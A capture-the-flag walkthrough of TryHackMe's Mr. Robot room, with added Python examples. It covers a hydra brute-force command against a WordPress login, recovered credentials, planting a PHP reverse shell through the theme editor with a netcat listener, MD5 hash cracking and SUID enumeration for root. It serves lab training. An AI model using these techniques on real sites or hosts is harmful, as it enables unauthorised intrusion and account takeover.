TryHackMe: Mr. Robot CTF
Vrijanandan Kumar
Cyber Security Enthusiast || CTF Player || Security Researcher || Passionate about Securing the Digital World || CEH
Difficulty: Medium
Room URL: https://tryhackme.com/room/mrrobot
Scanning
rustscan -a <IP>
The scan reported ports 22, 80 and 443 (SSH, HTTP and HTTPS respectively). The web service on 80/443 is where the rest of the attack takes place.
Upon visiting the website we found some commands that can be run.
I used nikto to get additional details about the web server, then ran gobuster to do some directory fuzzing.
Two results stand out. /dashboard is the admin login interface of a WordPress site, and robots.txt is worth reading as well.
The last entry in robots.txt is the first flag: fetch it and submit it to record your progress.
robots.txt also lists fsocity.dic, a wordlist we can use to brute-force the username and password of the admin panel. Download it to the attack machine. The file contains a large number of duplicate lines, so deduplicate it before using it; that cuts the brute-force time considerably.
Exploiting
/wp-login.php reveals the WordPress login panel. Visiting it, I tried a random username and password and looked at what it shows:
A key thing to note is that the website gives a different response when the username is incorrect compared to when the username is correct but the password is incorrect. This is a significant flaw: the login form acts as an oracle for valid usernames (username enumeration).
We will exploit this flaw to first obtain the username and then the password.
To do this, enter any username and password, and intercept the request using Burp Suite.
The POST body is what we are concerned about: the username goes in the log= parameter and the password in pwd=. Using the log= field, we will brute force the username.
hydra -L fsocity.dic -p test <IP> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"
The string after the last colon is the failure marker: any response that does not contain "Invalid username" belongs to a valid account. Here we found the username Elliot.
When we enter the correct username but an incorrect password, the response is different (it says the password for that username is incorrect).
Now that we have the username, let's brute force the password. You can use the Hydra tool for this with a similar command (fixing the username with -l Elliot and supplying the wordlist with -P). In my case, Hydra was taking a very long time, so I switched to using WPScan.
And we got the password:
Username: Elliot, Password: ER28-0652
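The following is an added example, not code from the original writeup: it simulates the two-stage attack above (username enumeration through the "Invalid username" oracle, then password brute force against the found user) and the wordlist deduplication step. The target is a stand-in function that returns the two distinct WordPress error strings; the credentials it accepts are assumed to be the ones the writeup recovered, and the wordlist is a constructed sample with duplicates to mimic fsocity.dic. Against the real box, the probe function would be a POST to /wp-login.php.

```python
"""Simulated WordPress login oracle: enumerate the username, then the password.

Added example. The target, credentials and wordlist are constructed;
nothing here touches the network.
"""
from typing import Callable, Iterable, Optional

# Credentials the simulated target accepts (assumed to match the writeup).
_SIM_USER = "Elliot"
_SIM_PASS = "ER28-0652"

# The two distinguishable WordPress error messages (wording as in wp-login.php).
INVALID_USERNAME = "<strong>ERROR</strong>: Invalid username."
WRONG_PASSWORD = ("<strong>ERROR</strong>: The password you entered for the "
                  "username <strong>{user}</strong> is incorrect.")
LOGIN_OK = "Location: /wp-admin/"

Probe = Callable[[str, str], str]


def wp_login_response(user: str, password: str) -> str:
    """Stand-in for POST /wp-login.php with body log=<user>&pwd=<password>."""
    if user != _SIM_USER:
        return INVALID_USERNAME
    if password != _SIM_PASS:
        return WRONG_PASSWORD.format(user=user)
    return LOGIN_OK


def dedupe(words: Iterable[str]) -> list[str]:
    """Order-preserving deduplication; drops blank lines and surrounding whitespace."""
    seen: set[str] = set()
    out: list[str] = []
    for w in words:
        w = w.strip()
        if w and w not in seen:
            seen.add(w)
            out.append(w)
    return out


def enumerate_username(candidates: Iterable[str],
                       probe: Probe = wp_login_response) -> Optional[str]:
    """Equivalent of: hydra -L wordlist -p test ... ':Invalid username'.

    The password is a throwaway; the only signal is whether the failure
    marker 'Invalid username' is present in the response.
    """
    for user in candidates:
        if "Invalid username" not in probe(user, "test"):
            return user
    return None


def brute_force_password(user: str, candidates: Iterable[str],
                         probe: Probe = wp_login_response) -> Optional[str]:
    """Second stage: username fixed, failure marker is now 'is incorrect'."""
    for pw in candidates:
        if "is incorrect" not in probe(user, pw):
            return pw
    return None


# Constructed wordlist sample; the repeats imitate fsocity.dic, which is
# mostly duplicate lines (roughly 11,000 unique entries in over 850,000 lines).
SAMPLE_WORDLIST = ["true", "false", "wikia", "from", "Elliot",
                   "true", "ER28-0652", "mrrobot", "Elliot", "false"]


def run_attack(wordlist: Iterable[str] = SAMPLE_WORDLIST,
               probe: Probe = wp_login_response) -> Optional[tuple[str, Optional[str]]]:
    """Dedupe, enumerate the username, then brute-force its password."""
    words = dedupe(wordlist)
    user = enumerate_username(words, probe)
    if user is None:
        return None
    return (user, brute_force_password(user, words, probe))


if __name__ == "__main__":
    print(run_attack())
```

Deduplicating first matters because every remaining line costs one HTTP request in both stages; on the real wordlist that is the difference between minutes and hours.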
Let's log in with these credentials.
We now have access to the WordPress dashboard.
Our best next step is to replace one of the site's PHP files with a malicious one, so that when the website executes that PHP we get a reverse shell. For this I will be using the PHP reverse shell from pentestmonkey: https://github.com/pentestmonkey/php-reverse-shell
In the WordPress theme editor, paste the reverse shell in place of a theme PHP file, set $ip and $port in the script to your attacker machine's IP and listener port, and click Update File.
On your attacker machine, have a netcat listener ready with nc -lnvp 1234 (make sure it is the same port as in the script), then request the edited file in the browser to trigger the connection.
Looking at the home directory of the robot user, we can see two files: key-2-of-3.txt and password.raw-md5.
We don't have access to key-2-of-3.txt as the user we landed as, but we can read password.raw-md5. Reading the password file reveals what looks like a username and the MD5 hash of a password. MD5 is a hash, not encryption, so it cannot be decrypted, but an unsalted MD5 of a short string falls to a wordlist or an online lookup in seconds:
Cracking the hash reveals abcdefghijklmnopqrstuvwxyz
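Added example (not part of the original writeup): parsing a file in the user:md5 layout that password.raw-md5 uses and cracking the hash with a dictionary. The sample file content is constructed here by hashing the plaintext the writeup recovered, so the real file's contents are not reproduced, and the wordlist is a small constructed list; in practice you would feed it rockyou.txt or use a lookup service.

```python
"""Dictionary attack on a 'user:md5hex' file such as password.raw-md5.

Added example. The file content and wordlist are constructed.
"""
import hashlib
import re
from typing import Iterable, Optional

_MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_raw_md5(text: str) -> dict[str, str]:
    """Parse 'user:md5hex' lines into {user: digest}; skip blank or malformed lines."""
    creds: dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        digest = digest.strip().lower()
        if _MD5_RE.match(digest):
            creds[user.strip()] = digest
    return creds


def crack_md5(digest: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 matches, or None.

    MD5 here is unsalted, so each candidate costs one hash; no rainbow
    tables or GPU needed for a short, predictable plaintext.
    """
    digest = digest.lower()
    for word in wordlist:
        word = word.rstrip("\r\n")
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def crack_file(text: str, wordlist: Iterable[str]) -> dict[str, Optional[str]]:
    """Crack every entry in a raw-md5 file; unmatched users map to None."""
    words = list(wordlist)  # materialise once so it can be re-iterated per user
    return {user: crack_md5(h, words) for user, h in parse_raw_md5(text).items()}


# Constructed sample input: same layout as the box's file, hash computed
# from the recovered plaintext rather than copied from the machine.
DEMO_PLAINTEXT = "abcdefghijklmnopqrstuvwxyz"
SAMPLE_RAW_MD5 = "robot:" + hashlib.md5(DEMO_PLAINTEXT.encode()).hexdigest() + "\n"
SAMPLE_WORDLIST = ["password", "123456", "mrrobot", "fsociety", DEMO_PLAINTEXT]


if __name__ == "__main__":
    print(crack_file(SAMPLE_RAW_MD5, SAMPLE_WORDLIST))
```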
Let's switch user to robot with the cracked password. Note that su needs a proper TTY, so if the reverse shell refuses, upgrade it to an interactive shell first (for example with Python's pty module).
The last step is privilege escalation: enumerate the binaries that run with elevated privileges on the box, then search https://gtfobins.github.io/ for them to find the technique that gives a root shell.
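Added example, not from the original writeup: the enumeration step that precedes the GTFOBins lookup. It walks the filesystem for SUID binaries (GTFOBins also covers sudo rules and capabilities, which this does not check) and filters the hits against a small, constructed subset of basenames that GTFOBins lists under SUID. The demo function builds a throwaway directory with one SUID file so the logic can be checked without scanning a real system; the candidate set is illustrative, not the full GTFOBins list.

```python
"""Find SUID binaries and flag the ones worth looking up on GTFOBins.

Added example. GTFOBINS_SUID_SUBSET is a constructed, partial list;
consult https://gtfobins.github.io/ for the real one.
"""
import os
import stat
import tempfile

# Constructed subset of basenames GTFOBins documents under "SUID".
GTFOBINS_SUID_SUBSET = {"bash", "sh", "find", "vim", "vi", "python", "perl", "env", "less", "more"}


def find_suid(root: str = "/") -> list[str]:
    """Return regular files under root whose SUID bit is set, sorted.

    Uses lstat so symlinks are reported as links (and skipped), not as their
    targets, and ignores directories that cannot be read.
    """
    hits: list[str] = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def gtfobins_candidates(paths: list[str]) -> list[str]:
    """Keep only hits whose basename appears in the GTFOBins subset.

    Standard setuid tools such as passwd, sudo and mount are expected on
    any box; an interpreter or editor with SUID set is the unusual find.
    """
    return [p for p in paths if os.path.basename(p) in GTFOBINS_SUID_SUBSET]


def demo() -> dict:
    """Build a temp dir with one SUID file and one plain file, then scan it."""
    d = tempfile.mkdtemp(prefix="suid-demo-")
    suid_path = os.path.join(d, "vim")     # name chosen to hit the subset
    plain_path = os.path.join(d, "plain")
    for p in (suid_path, plain_path):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
    os.chmod(suid_path, 0o4755)   # rwsr-xr-x: SUID set
    os.chmod(plain_path, 0o755)   # rwxr-xr-x: no SUID
    found = find_suid(d)
    return {"expected_suid": suid_path, "found": found,
            "candidates": gtfobins_candidates(found)}


if __name__ == "__main__":
    # Real use: python3 find_suid.py, then look up each candidate on GTFOBins.
    for p in gtfobins_candidates(find_suid("/")):
        print(p)
```

Run it as the low-privileged user you have on the box; the `find / -perm -4000` one-liner gives the same raw list, but filtering by basename is what turns a page of hits into the one or two entries worth opening on GTFOBins.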
Thanks for reading.